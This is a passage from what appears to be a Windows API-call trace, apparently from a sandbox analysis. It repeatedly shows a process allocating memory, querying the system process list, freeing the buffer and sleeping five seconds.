ResultLength=0x0) returned 0x0 [0280.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.895] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.925] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.045] NtAllocateVirtualMemory (in: 